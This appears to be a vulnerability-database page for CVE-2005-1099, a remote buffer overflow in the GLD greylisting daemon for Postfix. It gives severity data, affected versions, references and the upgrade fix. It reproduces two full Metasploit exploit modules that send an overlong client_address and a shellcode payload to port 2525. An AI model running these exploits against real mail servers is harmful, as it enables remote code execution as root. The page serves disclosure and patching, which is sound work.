CVE-2005-1099
CVSS 10.0
Published: 2005-04-12 00:00:00
Revised: 2016-10-17 23:17:09

[Original] Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.


[CNNVD] Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability (CNNVD-200504-025)

Greylisting daemon is a package that implements greylisting on a mail server.
Multiple buffer overflows exist in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4; when GLD is listening on a network interface, remote attackers can exploit them to execute arbitrary code.

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:salim_gasmi:gld:1.2
cpe:/a:salim_gasmi:gld:1.4
cpe:/a:salim_gasmi:gld:1.1
cpe:/a:salim_gasmi:gld:1.3
cpe:/a:salim_gasmi:gld:1.3.1
cpe:/a:salim_gasmi:gld:1.0

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1099
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1099
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-025
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=111339935903880&w=2
(UNKNOWN)  BUGTRAQ  20050412 GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
http://marc.info/?l=bugtraq&m=111342432325670&w=2
(UNKNOWN)  BUGTRAQ  20050413 Gld 1.5 released (security fix)
http://security.gentoo.org/glsa/glsa-200504-10.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200504-10
http://securitytracker.com/alerts/2005/Apr/1013678.html
(VENDOR_ADVISORY)  SECTRACK  1013678
http://www.gasmi.net/down/gld-history
(VENDOR_ADVISORY)  CONFIRM  http://www.gasmi.net/down/gld-history
http://xforce.iss.net/xforce/xfdb/20066
(VENDOR_ADVISORY)  XF  gld-serverc-bo(20066)

- Vulnerability Information

Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-04-12 00:00:00 2005-10-20 00:00:00
Remote
Greylisting daemon is a package that implements greylisting on a mail server.
Multiple buffer overflows exist in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4; when GLD is listening on a network interface, remote attackers can exploit them to execute arbitrary code.

- Advisories and Patches


- Vulnerability Information (10023)

Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow (EDBID:10023)
linux remote
2005-04-12 Verified
2525 patrick
N/A [Download]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision$',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end
	
	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end
		

- Vulnerability Information (16841)

GLD (Greylisting Daemon) Postfix Buffer Overflow (EDBID:16841)
linux remote
2010-07-03 Verified
0 metasploit
N/A [Download]
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack buffer overflow in the Salim Gasmi
				GLD <= 1.4 greylisting daemon for Postfix. By sending an
				overly long string the stack can be overwritten.
			},
			'Version'	=> '$Revision: 9669 $',
			'Author'	=> [ 'patrick' ],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'linux',
			'References'	=>
				[
					[ 'CVE', '2005-1099' ],
					[ 'OSVDB', '15492' ],
					[ 'BID', '13129' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 1000,
					'BadChars' => "\x00\x0a\x0d\x20=",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
				],
			'DefaultTarget'	=> 0,
			'DisclosureDate'  => 'Apr 12 2005'
		))

		register_options(
			[
				Opt::RPORT(2525)
			],
			self.class
		)
	end

	def exploit
		connect

		sploit = "sender="+ payload.encoded + "\r\n"
		sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

		sock.put(sploit)
		handler
		disconnect

	end

end
		

- Vulnerability Information (F82242)

GLD (Greylisting Daemon) Postfix Buffer Overflow (PacketStormID:F82242)
2009-10-27 00:00:00
patrick  
exploit,overflow
CVE-2005-1099
[Download]

This Metasploit module exploits a stack overflow in the Salim Gasmi GLD versions 1.4 and below greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.


- Vulnerability Information

15492
GLD server.c Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

A remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code, resulting in a loss of integrity.

- Timeline

2005-04-12 Unknown
2005-04-12 Unknown

- Solution

Upgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
Boundary Condition Error 13129
Yes No
2005-04-12 12:00:00 2009-07-12 12:56:00
"dong-hun you" <xploit@hackermail.com> disclosed this vulnerability.

- Affected Program Versions

Salim Gasmi GLD 1.4
+ Gentoo Linux
Salim Gasmi GLD 1.3.1
Salim Gasmi GLD 1.3
Salim Gasmi GLD 1.2
Salim Gasmi GLD 1.1
Salim Gasmi GLD 1.0
Salim Gasmi GLD 1.5
+ Gentoo Linux

- Unaffected Program Versions

Salim Gasmi GLD 1.5
+ Gentoo Linux

- Vulnerability Discussion

It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it.

Remote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.

GLD version 1.4 is reportedly affected, but prior versions may also be affected.
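The failure mode described above, as an added example in C that is not GLD's or Metasploit's code: a bounded parser for Postfix policy-protocol "name=value" lines that rejects a value too long for its fixed-size field instead of copying it unchecked (FIELD_MAX, struct policy_req and the function names are assumptions; the sample request is constructed).

```c
#include <string.h>

/* Added example, not GLD's code. A Postfix policy request is a run of
 * "name=value" lines ended by a blank line. The advisory describes GLD
 * copying such values into fixed-size buffers without checking their
 * length; here the length is checked before the copy. FIELD_MAX and the
 * struct are hypothetical. */
#define FIELD_MAX 64

struct policy_req {
    char sender[FIELD_MAX];
    char client_address[FIELD_MAX];
};

/* Store one attribute line. Returns 1 = stored, 0 = attribute not
 * tracked (ignored), -1 = malformed or value too long (rejected). */
int store_attr_safe(struct policy_req *r, const char *line)
{
    size_t llen = strcspn(line, "\n");         /* only look within this line */
    const char *eq = memchr(line, '=', llen);
    if (eq == NULL) return -1;                 /* malformed: no "name=" */
    size_t klen = (size_t)(eq - line);
    const char *val = eq + 1;
    size_t vlen = strcspn(val, "\r\n");        /* value runs to end of line */
    char *dst;
    if (klen == 6 && memcmp(line, "sender", 6) == 0) dst = r->sender;
    else if (klen == 14 && memcmp(line, "client_address", 14) == 0) dst = r->client_address;
    else return 0;
    /* The missing bound: an unchecked strcpy(dst, val) here is the
     * pattern the advisory describes. Reject rather than truncate. */
    if (vlen >= FIELD_MAX) return -1;
    memcpy(dst, val, vlen);
    dst[vlen] = '\0';
    return 1;
}

/* Parse a whole request. Returns the number of attributes stored,
 * or -1 as soon as any line is rejected. */
int parse_request(const char *raw, struct policy_req *r)
{
    int stored = 0, rc;
    memset(r, 0, sizeof *r);
    while (*raw != '\0' && *raw != '\r' && *raw != '\n') {   /* blank line ends request */
        if ((rc = store_attr_safe(r, raw)) < 0) return -1;
        stored += rc;
        raw += strcspn(raw, "\n");
        if (*raw == '\n') raw++;
    }
    return stored;
}
```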

- Exploit

A proof of concept exploit was provided by "you dong-hun" (Xpl017Elz) <szoahc@hotmail.com>:

- Solution

Gentoo Linux has released advisory GLSA 200504-10 dealing with this and other issues. Gentoo advises that all users update their packages by carrying out the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=mail-filter/gld-1.5"

For more information, please see the referenced Gentoo Linux advisory.

The vendor, Salim Gasmi, has released an upgrade resolving these issues.

Salim Gasmi GLD 1.0
Salim Gasmi GLD 1.1
Salim Gasmi GLD 1.2
Salim Gasmi GLD 1.3
Salim Gasmi GLD 1.3.1
Salim Gasmi GLD 1.4

- References

